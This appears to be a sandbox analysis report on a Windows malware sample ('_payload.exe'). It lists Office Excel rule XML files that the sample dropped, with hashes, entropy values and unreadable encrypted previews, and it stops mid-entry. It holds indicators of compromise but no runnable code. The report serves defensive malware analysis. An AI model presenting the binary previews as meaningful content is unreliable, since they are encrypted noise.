                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....$6q9..U.....rw...H.".N....:..Q....../.....!....).^....P..J....(:n.hL.L..hC.i.6..{v..y.N.....e..:e.%B?y.........q.z.Aa3Gr.,...V.M...&L.EB...[!..f../._ 8.Y...(2N'...b....=.rU8...o.Q..A.Uy.......f),-el..i.C..eV..".J.....v.......oE..w#w.....n..k......H"oy..Y...0.]!M...Q......W..E.3JA.....zK.........^Ry....XS?|....\....dQA...U......Bp....wdg.}Q+y*.W......,}h=,.]...W=..w.......~q.>hoOK:^cM....K....[..^..X........9O&...Z..L1.i...uu..W.......a...#ce...`lQ...p.....a....=.ig.fK.d...b... H....W.#..U...X...]..e..<?...=_.J..s...hO...=......P....[....E....E.8..v.&Pt.L..<.P!...-.s.k)..7k.Z"...d..9-L..|.v..\].....]{.....r..8....+4"...-S2.fvN......vL......E.!.3..r.gSt/s..mj.......h.X..*D..|....=.~.|.i{S..[.Y....K...l........}...w.X..G.;7/&.7W.........iT..../...q.&.6......U...Ig.1.I.[o.g8~S....E...SO.Nk.A...V.(zY(4.....V.u0v......!....|.>...EO....o%..tRY.9I..9..F.....3..._.T.;...>..B..5?...$....@....#.4..'.6...N.#....!&.~..>.k.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320003v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1144
                                                                                                                          Entropy (8bit):7.825157977671501
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:dhulukbXLSKZ8CRx1jiMxw4t8QMDRfZL8NB23WTVz/dN/bD:jquc75D3jiMxw4CkNBpxjD
                                                                                                                          MD5:2C1AF6E16F9E65989546B90E19C53FAB
                                                                                                                          SHA1:E14EBC749573A247099BABEB6DF27FBB0140034F
                                                                                                                          SHA-256:A7A5B5B1B2944666577B1FD69B7A8796C26A9E7D82F210A5AB2399151BFF07B1
                                                                                                                          SHA-512:86C2BA32C138742506B4885418AE587046D1D1CC0DC6C28DB5CA28A0D70F5ABE90F80581711E2104A88B755C4A5A6B30EE79E7CA00A669183C122A08A2877B61
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.4z....z.{.x.S...;6J.R>...|..k.`....#$............yR..&@2..&..T.............i.*...y...{/.[.-<}F.K.a.wc.....K.I..T....WXf.F.{@.F...,..`C.C......z..[t....N......I...Ca..D......?{._.......|.f.q.~V..GZ..#s0._.Jj..ej.rMcq.F9..3M...qk.>Q.`.a..q...m.-.............?.aa#.p.m.kE.".......Nf....9.ao.#.P&%..3.g...[{1(.P..R......D..~..b7..?.....in....K....:..i...!3.)..Z..+pC.b..E....9>. .............f...,.wr...b)....?}......N.kF..`..\.[.<.Xy.5..D./......{.B..r...P.D.......3..5.R.&.&....^..N.cI..mi..7rCv:.w..lAI..=..bT-....Kt.$.../t....r..........k..........%w.:.kc...&aQ.....(......K.|R........n..Ia.&.t...!.......%..B.B..T..Vsi....n.]....d.ju.tx....3|At.~|...6...,~..4..pgqe...^waZ..A...}9}..`O.^'.#..M.."9.'.e.1d.u.[..A.m..f.+.%.....s.O.2/..@gt.Sc@......p0..=...;.k..S.....zG.q....M.Y.$.......u.I(..a}..-.0.#.......y..D3z'.fz.m....+..H.6........V...KS..-.`....S[.*....[`n.Q.....@V......qO.......~~4..u.AJ..=D.R...>pj..c=#vp.i8.k.?..a.V0..P........v.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320004v6.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1967
                                                                                                                          Entropy (8bit):7.909780610137476
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:PkfvyKPaZ9lL0YW4T4UyjAEkM/NEQBvxwT1+b03qZD:cdy/lLm4NGrt/PaT1I/R
                                                                                                                          MD5:56EA2BFAD72A98B342F7C31C203CB16F
                                                                                                                          SHA1:F4E902A050127071A819E69A7CAC3012A2C96D89
                                                                                                                          SHA-256:CAA4975F7BAA3B8DA2AF9FEA7672531325917B88F94AA76050027E24808A87DF
                                                                                                                          SHA-512:D86C153315C59167F9AD43B7429E9A4F2A4A6065DB8538817567F13D26BCC57D59C0A8F50175C6B9ABE4A81C95216E9080D9BB14BC2CFF0907308AAA8B0CCA0C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..7.._M.sh.d.*.....A*...L.....l...........%b.......`...xR4U....l")0..dhqIT&.B...1$..|!......p...vE...._..Dd.6.....+..#j.......N....]...bn.Xt..8.S#.K'.d`..... ...HS:..q....Kp........dc.N....A.).W......i..Qv.R...%....(z..N.1X.......V.c..z..v..z.O.......zF.._....?.z7.V..}...<...m.)...Ep.........N.....ab.....Y....G.....V.8M....ym..u.H...%....C...S}.\.....X%....CJ"f>k..m.d,E..Vd..y......s..W..w'..Z....O=Y_m..h...%.....nfd....G..]<....6...oF.....e....>...p........#..ez.H.s.8:.}.Kx.7.o..m.l.8.4(.U..~:..YN<...L^.....)..*...6D.h.C^...K`...$3h..is.{..G...|>.R*.p8.1..b...z.F..S......a..7..-....o9|,...$.....,.J.........0..D.....y...P.+.s....*$.....4Fp3.p"......Q.W..gK.'../'.~u...@.Zz.^jb.gs.,!.`Of...U}..X....!.%. ...S..)....K...N.].&.0.o............m....A}.Vt....r..p.~.....(.....5q.}P..&pv0*..?,0..U.....\Y%_...C.5Y8!...u)gL=..x........Y.j. {..GxU-..I.I.y....@_"1S.m....3...xX.I.8z....i.@......$.."...O...S.....*vR....YK|L..M6.PD...F.<..3D...Nt

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320005v4.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1427
                                                                                                                          Entropy (8bit):7.8666676961102135
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:UfDzEKgHniZ6aXIRyn73M5iKfgeSp+brjWosilZzpHdjz1PuX/TbGbD:UfDzElHAIRyn7DeO+HpJDjNuXUD
                                                                                                                          MD5:89BE3E6D65ECDF5CD0E08CF05B18F203
                                                                                                                          SHA1:409E10FBBC0C97D6E21A294EDFCA5AFD6709D6C6
                                                                                                                          SHA-256:51E50009A86805F5A3FD3F3DC29AFCFCE189BCB5D0B926FD92C9E06237FAC43D
                                                                                                                          SHA-512:990936A5378D0929B61224C053D2236289AE76746A2031F893C067A2B210CBD71AAFA36A7C5C0E7497BAEA29D8C0DD3752E2014FC87FD1ECC011DC791CE69482
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..F9...2.E....T.W+f..=..W.n]..D........ .<....,...0....>-:.......e..?l"a..D.k.....<.......FW..n_)%.}O...q...76..[..t)[..a.B.....^...).J..QE$e..A...kaB!...+..N/$s.W......~..Y-........@..8../....J!(f......F.Op.{..PJ.d..o.S.L....hrt....'.\......^0.....^...<T.~. ....,.....gK}d..7.......Iwf....*u 3.m.)b...s_.!cVD..J.R.A.I.v.. ..n....\.]#e:@n..pv4.....k.o...Nx..2.....$##zX..i...|..\@..K.h....W.I.BS1..........J:..x.~.....Ihe../.izh.H0k9.Z..&@.+.C..b.c..U......t..f..G..Jb6]...,..!PuA.&.cq5.f"OR=.....4. .{IS........a=.1rGhT..I.. bb3.}:.M....9SI..5..U.x>]..<..e....$&}b......+....3.........r7..&......:..g..A..QC6M..M........~....x&-.H\..w....;.....<$d5...!..........K...|.k..>t...X...nx.C.W.G..C......3.q.T.j[ ..O..4.=...H........{...B.Z.VLM....>..rx.......HP^..v-......t9h..3~..... \!0.../.....H..s.Nz....n>..fP.!kh#*.?...u..F3..lZ.a.U,Q..O.....2c{~%_$.Hu..".1...H@.....rv...S|...'.0p./1~.k.......?...R0...2.<....=oM~W/Qgj..$.....g.m.<O.....0e.'.\

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320006v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1528
                                                                                                                          Entropy (8bit):7.860242045517988
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:wjS1UONjEWhv9InFAmOvjdnAUdK7+KDKrqpLtxc/F0Bw1iVix6e42S5bD:wmKCXIn6pvhn/dK7LxpLtx9w1iyc5D
                                                                                                                          MD5:58DCE00F12558D95F40A7A9225887A18
                                                                                                                          SHA1:1036DAC4D69D9A41B617088D411CE751F250D983
                                                                                                                          SHA-256:238AFDE4109C765BAAC10CBCA32EECB899B7AEC75E6BBD7DEAE10B54607431AA
                                                                                                                          SHA-512:F85010BC4B282D1F513D6E9875F12A1B2C57B749C9325F67D43D1A5A0628E9FEBA566335C7D104621682CD8663DD778168D214FD7361A1A12DE2320CD334B645
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.ql.c.Y.........<..N.....~.m../.X......[]1.H/.!.6I7.....:.B..*c.5.4..q...4\..2.9....u....i...M./ok....1]...].*..6.UnW..g.....0G..F:a...Op.....#......&..-..T...j...........=%..........GuQ3...........x.s...6f.X(E*[y.$.|....?.ZF........7T..9~.o...U.g.....OM....!.b....X:.. ..#D...1.U..,.f...s./P<...{+... J.F6..A....~i`...P..Rh]........._......e...XPrtyJQ.Z.g.X.3..6...w..PL`.r6..\.I>=./..x.L..D.K.$.V..:............&.. ..WO'...[....q..;......TD...\..fSp.w.D.`.!B..9..ESxn..q..\..~.E......L.....(...Ep.A..\.R.....&2.....r'-X.f..Q........z.iO_...,..)..?@Ee..&a.^!.5..V....~.....I.w0%.5......n.c.K.!.Bfg..A.......L....2e.e..s.J...G.....;..r.L..z...j5a.r1.....,.nzTO.....(.=.fo.LG..IY...~.{..t....6D..v.\Tz.....s..d..rq.>?:.........]..h7..].n.....'t.G...}l.*L?NBA.j..aI.=..1,..x.....d=[..36q... ...L@N...q...*?Y..N...!.r8.*...F...T...].b.c....{Z.%...F-.GY..~.<.*..O1.,.94.).0D..m.fE,X..m#.U\...!.k.Yf.....+.X:....T+...D?Nisa...OQ.G..>.....).....$

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320007v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1233
                                                                                                                          Entropy (8bit):7.83703866349634
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:+/Yf8bzfou0P3nC6XAwk4IeHNZ7ptqZ8gJBppWe2oy1wxbD:GxHouO3C6XOeZL3gTl2yD
                                                                                                                          MD5:36FEA6B5809CCF733FB20A0BFFF937D0
                                                                                                                          SHA1:5786AA26004B15D540255272D2C179B79F576D50
                                                                                                                          SHA-256:2C095BB6DE9FAA019C10FACC7446659771F61DAC79FAAF5D552DBEB0C22C26CE
                                                                                                                          SHA-512:F077A133DC686B3994A9C18CBB638CCC9729078362CA02D15665CD7CC60267CFCE4BD8549AAAB3086E94D3FACA9002EB9AB4FA645D4B5356FCDCFD5181FD6417
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...U..Y.K.UN...1.6e.."&.%D>....R.(..H.....S..,..C.n.;=......Q...O.....g../1..b.,<d..M......2..bP)u.z.!}...M<..lL&..^..?..I.R.H....2.v....wn.....5]<.&.e.T..CTskJo*....k(.y..".K.c.Gv.".&.-..}..k?.[4......f.....[.....&*.o@..;}u.~k..Z.h.-[.......).9.3.y.$5~.4.Y....].....z...n,oW..n.k.gB..#.6.T...;..)}...o5,..M..S..M%.w.~.3@...t...i........zHy...-.>A....h(....{.=#...fF.......M_e..N..8...{.X`../...|.....~...J;..c... P..8...H..-...}$.z.S{7J.....z(Q...Y.e.d.EE....}.8..q....q".....\}5.......o.......Fy1z.)V../X.hW........JQ.....}rH....Q....F..yDMg..'9.v..:.....r.BV..R.fO.q..S......].7mQ.3Jm}.n-.......oGq..P..6...&m...0F...d;.c.p....T.."=.P.V.b..,L...e...(-4`U.2..U@.ul.``)..C.+1l.v..........._.[.V.."QO.q].3..Zz..E.5.........M|.._Kicp...../J..:/...X..WG.E.,_.*.t.....>........i.V[U..7t.........\bn=v.OT.........T....%.D_]..m.IA..S.\.~.yd.:E)./xa....r.n....q~...@[..d1.. ..S p...E)..5..a...?.L.z[^?.`.j.;X6..f...z~.!I...U.-.\.L.>.S.T.W.....Xvlkye.k.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320009v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):866
                                                                                                                          Entropy (8bit):7.744834316056068
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:5F0Cqar9TSXB1pmsamKJIuOmEzJm29XGr3M/KQejbD:7TSXB6D9yL3ZcMSQuD
                                                                                                                          MD5:5CF093EEF10CB25B84FBFD300C4E86ED
                                                                                                                          SHA1:A26EF67249518F4613280A42C9EA26777ADB63A1
                                                                                                                          SHA-256:7B1A3DA0C188CBB50D91CEEDD3E9336A5B89E36A56EFF886D9F699CE4228032C
                                                                                                                          SHA-512:D71317C39889A53D026E6AFC80064056030D28315C18FD97AA002288F87B53205653907CB8A229969BE1B6E1B795059E26E2E1B38EB868CF852666ED4B52AF01
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlh.. .x/2.J.#..f.f...cf.......-.o.........c!QJ59!..V..%...x@t...../.{l._..Q0...=............x....~..uY....wh..I.....ax;....bV.K>....d:.).!8.+>.iT.......0.yo.@....M.......'.../.N.!...k#..y..4...tG..4.!.b..6.q%:..if.M\@..`....(!...z.....:.;V..m..v0\.F....@..Pa%.....t.A9.6.~..Zm>.U...n.I...kvq=f...^.#l...D.....Y.....[9.IC.@....%..w...2Xc.=2..~[.m..}.0n..Q..g..BZL..S....`....P./..f<%ib.a....m<.,.....eha.1tdo9f......A%f........C.fG.....2..E...+}g.^...wA.s.F..vq.*..|.z.......hL...{.........!..+....d.."..D.y..........!.;...n..)"fAF.......m.K....P. ...d...[..$*.h.K?X.Jr.-..).[.!.6@8...*C...... q.....D.I.Bu.BZ.b.FS..E..qR...^n..W..S.]...EB..CJ....h.H.....DW8.l#.4G6..K.\.{...0:.*....$.a......inY..rr..P=;.u.0.T!D.0....=.r.....F2...dw....z.OP...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320016v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):901
                                                                                                                          Entropy (8bit):7.738026714500118
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:NSa0dGnMbePeOW6itSUC9aQ3MUM3CkCqzVmAv+efvLms2sVy16ENF4ojlFpdcnqt:NpYoMoe/DIBMUbOaefvLo16EPJVcqbD
                                                                                                                          MD5:50048DBE7877CDB1187E7852EA05F5D4
                                                                                                                          SHA1:5B731766E5715C1AF8925B82322B01ADF5E5C84C
                                                                                                                          SHA-256:7E9298C243A7016CD2CD883DF9C769201836A0926954297BEA27144A431EB61C
                                                                                                                          SHA-512:B21851129CDDC14FDCE68047ABBA270E619174D54800795C60B8806C33470171CB137F4C3AE78042B8ED6637BCFE24F3F60B97C9F1E6B15AD47F0D536951C72F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..w3.......H|m..R7?...w.....SP..H.WK....J.P....=.Y.......b....,..G.I.u...8H...0.S.NID..?..YI....V._..S...IRke&Fh.".|...._..v^!@..[8..j..T.Ql,9{...Z.b....4.........B.8......|4..$X.x..rM8S...A...V.P.o.P..2....9..$....i.sE.M}+..x4..a..f.......}..S+f.C;....Wh.-...1.<.#.......2..W.......B9...-....-.R...]L...xI>.........>p..A).>.H..f.6.T|.N..H.M.......:..N....;....L.<....`..A.......B..P.."-\ ...;....E.......]...es.X.....E...r?....x{.C_3...$1..a.I.A8;.H....e#...}....0..euM.....gU.N=0.f..&A.h(...}v[.....1<......~a....[T......Y...2....!PdV..._hz.m.2n.k.b...=.KX=.n..^....yS......!..2^....Z"..*..<6...0m..JAF...1.r[{U.M.....n.EV..z@...:..#.......1.p..d.I....F1!...o.<R.Q.........;....("..9j.........pR........vQ}.q...WG.U+.......N9,.U.....Q8F...P:kk....M..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320021v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):860
                                                                                                                          Entropy (8bit):7.74561925988363
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:mPj3cw7i4VQ22C6g8x/t0J+LWjbNnKbjzJCODt5pF2/v4ocB5Va9ngVItEojuJqt:mj7mbgwqWWNYhtxocBon6gEsu4bD
                                                                                                                          MD5:5FC7E400960761903F860EEB66BD0C54
                                                                                                                          SHA1:9960134B770071849AB8714D9046002EAA7132F6
                                                                                                                          SHA-256:EEED87F014FEDA96F4B276FB171C82D5DD5B903A3143C352D82425A892BEEF9C
                                                                                                                          SHA-512:BD3278176057F5F41A8AB0F3953DB8CB7771A5EB2778E1D4F12E7C9441F1AAD6010EBA55B70C3B21B34A16854AEAE73B1E65B047B7E5FAB72E1750F6E9EF8E9E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlL.!._...9..Z.sU....s..E...T.....p.(T........-.../......I...b.1..l....C.o..A.r+..t.y.!h?7..*Y...%.Y..~..\..:.R.6..Q/..jB.;\.0~TC...%.BY..%..g....e..R.M..Fv:..@c......l=..._......GYz.IQu.)..}.*......./...}7....8..G..0n..l.t..cj....Hz...T.~...P....D..n...F.A...w0..O.%.......2...q[..K..{.Z..Q...~6F8zr..Q.h..&.........!......^..>....'*k.$..b....-x...4'.7...?.B...&.[..k......$...c...-..eRT.q.Z)A$.1..)XD...UT...y..m..8.4..O*...v....V.......K.?6......=..V]wH...@....W.Ypl......4...U..F$i.....Q.P<....1.;..D..7m.x.R..m...p...<...{..9{.Kx...-.....rq.....38.#.?q^...F%.n...x...1.N.l4_D6.W. ..=Q.K.7..X...j.>[5..<w...6L.3..Lfa{....%....604|L.. C!...~.`q.H..7\|.......5....+......._....h...k.?L.(2.k..!....}t..L.....Ox...;....So.M.G...H.&n."A.e.....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320022v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):760
                                                                                                                          Entropy (8bit):7.6788212377065985
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xZqrWQD+ePJO7GjamdiksYrMm2BaG1+ABoPR6jK9EwxZBVYFTd2Lq5bTcii9a:CrWIPwGjamdiod01+AiRJbXYFTY+bD
                                                                                                                          MD5:3A895D9947148086DA6898584880D406
                                                                                                                          SHA1:26C20275E1288206F64A394B11F150360B250156
                                                                                                                          SHA-256:51AD9FD96709E63B754E7897D89F0761DAF065C5574127DDD3FF2284F0ED6744
                                                                                                                          SHA-512:374908047E82AE4A2F737E93476108694EA71D9A546EBD42F5A10D4631E9EC47A257DF1D38884C3F90CAB1BA90ABC6D63832E98E79B7076BC89DA0A9BC826531
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.......]I..,.7.7O...Cn.........h"l.B.....6*..:........S2^y..0*..$..M.Bed......-...<S...)jn.R.!...8..H.5.....L......y.B.'H.\#..T.5'..r.+.U}.k.1..:....V..s.c....9.\/.A..}d. S.%...f....\. ..9XK.&q.b0r."n!!...JW...j."....).i..9..?.h..5S...=.t.t...k..U...?$.r9.qWt..{...2 .....|/.%.d..R.9}{A..|....~..0l.s.\U9....I.E\.J~H..#zT#..6.k......I^....K.}*...A..mH..r..mm..+...#...Z....0.6.D..w..x.*......qG.7Tj........>.....7...u../&.I...I.~...'.z.I...x..s...=X......f....eJQ.S...jK.k7|6...!..7....E ...3....gU...r.WO9u..(../{.x...R;...O..It...;X.i@~.o.7..U4I......D.3.MwDJ.....z...V,H>.`.s}.H.|fJNN6.e.i.Q.^.O.J.7.[..........H...L..a.L>_..H.....l.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320029v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1117
                                                                                                                          Entropy (8bit):7.821136211274683
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:nrv2mH5ARj6LjjTiN0rrtj8tHN5cAbH40Cd/Iz4JeRC2bD:rvDZoj6LgwSHDckYtdja3D
                                                                                                                          MD5:4F96E824FB758D0526CF3E11A8368FAF
                                                                                                                          SHA1:9CA6ACF853EF7976D06BF1B93504841BB2924825
                                                                                                                          SHA-256:8E58FBCDFD2CABA166C075EA158A4A95C2559946C9F49AC123410F21770FBD08
                                                                                                                          SHA-512:3DC8F1A6E045C0576681601D7EC3DF05B49BB7049F62477A6F13EBB173BE72F50D65D44C2B5EEDD3C24E89830D3FD82D38E773B2EEBECD2AADC39B4F47707D11
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..Q^EWA.....,...#I7s.Jg$&.$.^.A`......$C..V. ;...~:o.-/.I...q..j.gY.i}...R.n...5......?...j*.k.tQ..Vqu...r.+.E.....C.&g@IPu.}...v../.....{..6\.98XS....;2g...]..-s.fs...\U....0.....bN.SP..2.<..O.P...dwY_6p.}.......].(.`...oFo|.VI.dQ...YAU.E.`5SNQS....._.J$...........L..."Y,....m......2.BY..Q.....45Or.S..=6.....c^.eU..W...t.h.P:.....F...F.4.0..Y.P.....x.>..!.9.P._...g..`=.e..`..5..+\..u.../.?o..>B.B...v.s.........d..3.AUAg#...{]..34......s7.o.s%*}pm./.`......f.d1...X..9.k..HX...r..."...,.<..8sM.OY'.....f(cT@J{.......e/..=.M;..R."............B6%...g...H.\.!.....cr....F.M0.JH.~..3..e..9]9......vTe....y3..>1.Rd.DF:n.c1./.....^.x...?...i.V...<.k...i...B....B._f...c~s Zw.IJ$.r4............H...^..=..._R!.UO:.a...J.A.v.w.Z.B9.1Z.....j.....V..R....L.6o.7I.F.LU.ntP......^...."0...U'..d.o(....O0S.Z.....`T...,c3 .........coGn.C....5....y....k...Q.Y.F$.'.r'.c...B_.......C.y3...1......`...3..(.m....o....{.Z.8}hC..=b.*..G....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320032v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1025
                                                                                                                          Entropy (8bit):7.817524060514342
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:O1Yz3Hahq5sI3jDQEPzQLoXlKgjU1yCX4IAJKBbD:O1m3HahK3jDQEPzQccgstAKD
                                                                                                                          MD5:6E0F05109B81D63BBA57FDB84B7AA273
                                                                                                                          SHA1:FEE0528500A742C5FA37FEDFFE0F8ABFB6228947
                                                                                                                          SHA-256:84F35A5FC2033A364637BACCC42FF07DF01EC321A79363587953F0EE72AEFF19
                                                                                                                          SHA-512:33AB2077E10024D4E4C051036CCEF160ED5CF5F48F32EA3925F8BA2FA25FFC54D91A6519B0BE7DA41D7AF57F3899ED1B7AEE1409A5ED71254A61929C88996E66
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.S}F...T.&v..[5.q.........|;.g){w.g+.f....$.=i,.!.'o.....y..Q_$[....%...t.......8`.5..^P\E..............a.Y.. c..b.K.....<%.s.aPA.$Ubt.e.Z.Fm.<..."\....l.g5..g.k.2.%..0.zb.m..F\.........V.8....M(...9..N.!....M.i.b........q....x.z........p.a.zo.......X.,....$m..X..qD..J.._+.{..:...-..fg.}Ss.]kB.>....::....?.X..=.?......W.$F.)...#...C.V.0~...+=.........i.uk..|.....A.W.R.S ..cu.k.jM<_#....w..k ......xH{..>...{.k.."C. i.jM.Ry.r.H...V.......w<...^t..;0.[%.8.u...y..........Ji..;BnV.,....V.5.~&.."...xk.F......)J.{&YIYik$..I.bU~.A.......|.?.#na..5j...9.~..^.3bN...ES...H'(.{.0..`...K./..Ox.8C.HF.E./..7.....k....Mi...A.5sV9.Q.<.F.>...l...Zo|I2?...!...>.........k]7Tg&..g..~....{....N.V.p....n...6.i........%......<.b8.$.2.....5.Vh.MJ.^I...r..@Y...X.n1p..w..a.....X.......<....f7....f.v5.....p..vx#i.x...M<.W.Gi,..s.$...../'6c.h._..x.4#..+..j.z-.|(+m+.KA..F..P.y_(fJ.......|.~A....0W..)XhE.|.".qZ.c..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320033v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1112
                                                                                                                          Entropy (8bit):7.795557380971968
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:/jlE14x9IQZDi9yi6GTTzCrj07iCQ46gzEOfDaJl4WUSr7M1GbD:pE14x956rDPCrjg6gzEOfuobSr78UD
                                                                                                                          MD5:0A702174F4A15B3686A0CCC558D05683
                                                                                                                          SHA1:585954DC22A68BCE8BEF37570085A762080384B2
                                                                                                                          SHA-256:A32C02D9BD29EAD8B70963E05797F671D8F6D0B4E2ABB25FF3FB0DDB1FBF3123
                                                                                                                          SHA-512:A85B0BAD27A0D5E080805C1BC5097FFC31E94E4D516ACCEB35D931313B8F8C4065775E48E5636863C80F8D223A7A883B0540D0D48FA04E82BED06615C33E45D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..k!5..z..I!....*......."....l.....y$J.%....../.3.[.{.......;Y..!,...tp...|t%..?.fD....|.?.e.TYWd)m......\......g.....8KelY......[A'D.t/...tn.!.%.J.).....iN....Lf.F.=R.5..5s...O,.ms.f...,..".._.........[3....h..+.6+s..<.'.'...N...h..+".0.....G.D...G.....).....f.....o.-..-[...k|..F....^...F..Y.......:.......Yt....mn...]6)A..SY.~.*........<O......O.J.....?}:.X. ..n\Q..|..8&.g.i.UV....y.....x..M.....(.;i2....p..:..o!.L...H{..>.CZ.e..l......2..l4UP......XW|.u.in.....WL.W(Mz..P.w.*R...3.3.g#3.xN.j.0.ILy.V...~...n. A..s=..k.x.l......R.[....e.-1S.}......^.E...+x<u..eD.....:..vB...g....r....x....#.3........Q..s..[:7}.!..pk....i+.....dG..}O..LJ..t.c..u7.'....m.......2.X..".X..9.yD..........lIR..._&jhT....Q|y..$.<.......C..k.....0aT.t.=..Y.H."..W.v..RV...@....t.>3o.#.R..0.^\.....q.I..,...W.O....,+}..r...9.e.C....sI.j.."g.......]IR.a..=...yT.);.0.nCf..4....jd..YD..r:-.U.|...1........k.v.g.h.x..g._..h..3Aq...q..O....u....B.....5....K.d....".

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320034v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
